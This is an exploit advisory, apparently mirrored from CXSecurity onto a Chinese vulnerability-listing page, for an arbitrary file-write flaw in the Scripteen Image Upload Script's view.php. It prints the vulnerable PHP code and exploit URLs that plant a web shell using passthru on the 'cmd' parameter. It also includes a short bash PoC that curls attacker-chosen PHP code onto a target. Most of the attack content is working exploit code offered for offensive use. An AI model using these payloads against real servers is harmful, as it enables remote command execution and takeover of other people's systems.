Scripteen İmage Upload Script - Arbitrary File Injection - CXSecurity.com

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1793698 漏洞类型
发布时间 2019-10-23 更新时间 2019-10-23
CVE编号 N/A CNNVD-ID N/A
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2019100145
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
[+] Exploit Title : Scripteen İmage Upload Script Arbitrary File Injection

[+] Venedor Home Page : https://scripteen.com/
[+] Author : z3r0fy
[+] Twitter : z3r0fy
[+] Website : www.bugcontainer.gq


[+] Description :

Due to these codes in the View.php file

$home  =  fopen($_GET["file"],  "w");  fwrite($home,  $_GET["data"]);  

File can be written arbitrarily 
Exploit :  /app/view.php?file=shell.php&data=<?php phpinfo();?>
If you want to be made more offensive, 
app/view.php?file=shell.php&data=<?php passthru($_GET["cmd"]);?>
After poc is applied, This way the command can be run on the server "shell.php?cmd=" ​​



[+] PoC : 

#!/bin/bash
echo "
 __________ ____   ___  _______   __
|__  /___ /|  _ \ / _ \|  ___\ \ / /
  / /  |_ \| |_) | | | | |_   \ V / 
 / /_ ___) |  _ <| |_| |  _|   | |  
/____|____/|_| \_\\___/|_|     |_| 

"
echo" "
echo -n "[+] TARGET : " ;read hedef
echo -n "[+] PHP Code : " ;read kod
curl $hedef/app/view.php?file=shell.php&data=$kod